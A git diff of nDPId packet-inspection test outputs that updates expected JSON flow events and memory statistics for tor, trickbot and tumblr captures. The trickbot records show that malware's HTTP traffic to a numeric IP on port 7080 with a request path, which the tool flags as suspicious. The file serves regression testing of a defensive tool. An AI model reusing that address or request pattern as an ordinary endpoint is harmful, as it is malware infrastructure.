+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","packets-captured":3859,"packets-processed":3694,"total-skipped-flows":0,"total-l4-payload-len":2811958,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":10,"total-detection-updates":7,"total-updates":1,"current-active-flows":0,"total-active-flows":11,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":356,"global_ts_msec":1383822276211} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3859/3694 @@ -362,9 +362,9 @@ ~~ total active/idle flows...: 11/11 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6002035 bytes -~~ total memory freed........: 6002035 bytes -~~ total allocations/frees...: 121879/121879 +~~ total memory allocated....: 6135669 bytes +~~ total memory freed........: 6135669 bytes +~~ total allocations/frees...: 124641/124641 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 182 chars ~~ json string max len.......: 1405 chars diff --git a/test/results/trickbot.pcap.out b/test/results/trickbot.pcap.out index cd202d03a..da1f0299a 100644 --- a/test/results/trickbot.pcap.out +++ b/test/results/trickbot.pcap.out 
@@ -4,9 +4,9 @@ 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"} -01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} -01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} 
-01038{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} +01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} 
+01038{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":74,"total-skipped-flows":0,"total-l4-payload-len":57990,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1609266115947} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 74/74 
@@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871824 bytes -~~ total memory freed........: 5871824 bytes -~~ total allocations/frees...: 118195/118195 +~~ total memory allocated....: 6005458 bytes +~~ total memory freed........: 6005458 bytes +~~ total allocations/frees...: 120957/120957 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1245 chars diff --git a/test/results/tumblr.pcap.out b/test/results/tumblr.pcap.out index 469a0a93b..f2f2c18f9 100644 --- a/test/results/tumblr.pcap.out +++ b/test/results/tumblr.pcap.out 
@@ -10,15 +10,15 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605292102678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102678,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ9A6UTj6g1gBALxQp7AAABAQgKwt2UBql09U8="} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":750,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":750,"pkt_l4_len":696,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YArgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziFnW6Ce2BgBgB9Z0sAAABAQgKOMLyjsLdWyEXAwMCkwAAAAAAAAAEyttPIBHYl6fl6+wxakteQia67zuCx64sVbYiAEMKI1LRZB2ZjjRACezRfqMgcw8Wk8Ja+jFsbTh6PPGiWyRnZCafAJvoLbr\/QbtaCfYNT07cM7gv8MAYjagAz2\/uUXvHhHXYjVHplnNsW6sWSYWdjj7pK3cCYJyTWWk8KcaWVSPm5FJowuyKrEBg\/xvy4liO6V1qSsclVnGU5uOkFVqkiQyVPIXxSNOn3SjKKoV+GRhNjLSyOjDMf9ZrVDwqHvTDUwRZgkE5k6+v4Ngk9WrnV1ax1ubCqnHoIel2EK4gbfVvolwb83\/d3YNFV8lq1e+SHlYke+eJRKzjNIOw4b4Y36hRm5\/D2hks6V9vGkg6sSDzHRzniE1V4ce1mOtmNnefjf42UQc2HkOmWCkUVtMokEc166qSRXnlIooPlIQBw2b0stTzXYA2D5SN\/BALZmedX1SrmcVBJ4DrMf\/xHLEmuGaRjzLDgXIUB\/jHR45QJ7tyaECd\/R1pWTx+wCe3sS0fZlg4mB6GzVlIgWc0sXiXzk4KusTcJBlT6WCFzmZVXwOxGhq4mx\/Ar34HImolLoUFN3W4QPP1XuhLobsRn8+uu1UjAIOgrakq2nUZ7wxPjCRa6GR8HhsJaaSV8kQKCsWaODSJH8qsgcj27KMOqJKDEttTsUUejaBrXacD1ursBsQeG6kxeWCpc+pc+B6lF82QSaY+dqDc0x6adlVhzh25sn9xUc5gttNEqsRpcCwXleCFl5slq6Eo208ayh44XAy4\/3sSIcuuXZecriDdQNtCpH0D9WnZpbvC6F0uUd8YgEMLKpbVgkphXTjpgJPqNLHR1Jtsu8T0zduHUyA8I2rMdecA7vfO5m6vB6zg"} 
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":730,"pkt_l4_len":676,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAqQGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPNREQMJOagBgB9f9ZAAABAQgKI0OBn8LdXfIXAwMCf+a7XKOkxtVKJI04EV4D3mT6IiNw5ZdwpK\/ctvLby5AnUtCRp1wz9iXgvd8CBQl59Ed1wqXQfvbQcvgr9o4GGMRVH8BPyBiK9wAHxfoair+VUOV+cUyNlvDKwuPaUh\/47DlY44LAL0vv9eo4G0vPSmnyuohMST6JkC52HBED7hDgCc5lbkYutM3P7xGL1Z5MrmmzLXVyM4doUQOUayCKfyqRux1EiZDMeHsdoHvinwuW98Zns+5LqMwEKiz9\/ZA1Iu594xbEmeMockAnjj3HmV8YsDERU2TzTk3sWn0ZhKp12Rdx11cVSOnv1ddUqmkYpF6VPIBgfZdY0+3WEYNWwp9gOeZ1SPKEW1sZa\/MZbqxYU+ge0aUNP414S6YsDr4wWnXY\/hrIPt4hdVJid3p8HC+BYX8NVuisAelA3CsslL+yrlEZs\/QElNY2EIBitMqJSsgpwlduIlvcGoykV3DYfMjS3smQ0\/HaV+vGuY59BD+HYzkVJoRFJ5+AoB\/9kz8MrwgQrulG8+mXwGs2Tz+e0pxggDcl3iaCIQO5yUqOapIz\/jo8gXQAUjpsoKRzsKjRY\/OKBL3cj5DbujlngZrs+3yRDxMp\/A8kmIYDSMjyy21do9HW47erPa0WwNSepOx56UCCZyny26AleUHgV47LLX+Hh0DKxyVNOlUl474o9ZULR18pA1FtXPbynHGzdWF0peqNAJdGXSpxCnSDK+dkiaw9fmAlL\/EwEDJgbnaFqYBoa1wzZSNmUTmn9uQt7gG5UTLglNz7Gtm2hHwfzEK4uAknhpJOuKuRvE3auX9h725wqrVluU5SCPoyvKwHHRb0nBQK3ngxp6Haaq8pgOXbmw=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605292103806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103806,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dicAAABAQgKOMLykMLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605292103807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103807,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TxfAAABAQgKI0OBosLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} 
00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01015{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":468,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":468,"pkt_l4_len":414,"thread_ts_msec":1605292103810,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAZ4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtL87ROW\/JgBgB9bw+AAABAQgKM4zEpsLdXIMXAwMBeeuGCWF9Lb0Ci6TEBMXMSCRU5\/ujX\/oVXdGh+BNpGjYWczn5t9MnrcPf0zR8Rsvgek65i+QCA5M9xg538hLyui9336X\/wmAqUKW0ovcGHfVkBbInk26LgYglI5Td\/ssdGWORhYySPbJXLEFtu\/h1mXhj5XU6VyNxU9SBh\/8O12l+trWyWdbANDOIW9SbvtVRvHBRVZmz1ag3okb4Plbrh4Qi4B+G74t5h0\/qMYjiEuZ1+PtpSHBW9OPbPwwcOV4UZ67nf4PG8vUha9JOewT6Ihb4Yfc7EBAGx7VHrcHsn7dvXiF8gTt9bh55AJVAbM2ak8Yu6DoJnJsa+jvwTKddiAxdtJhT3E7fBmbothroFA49N5AzGnFsh4cxhtIWJBj0s+8J1Phi\/75LUnCD0lYbxKIDoOKf0QWR08Jx8MCXKqwRPsjDU42Fi\/URG4BOwibUPBjlxMt8e\/Bx1zwNGX2TOl3lRdKcwrnMTh58G0mfgl41Ox0e5b1fEr4M"} 
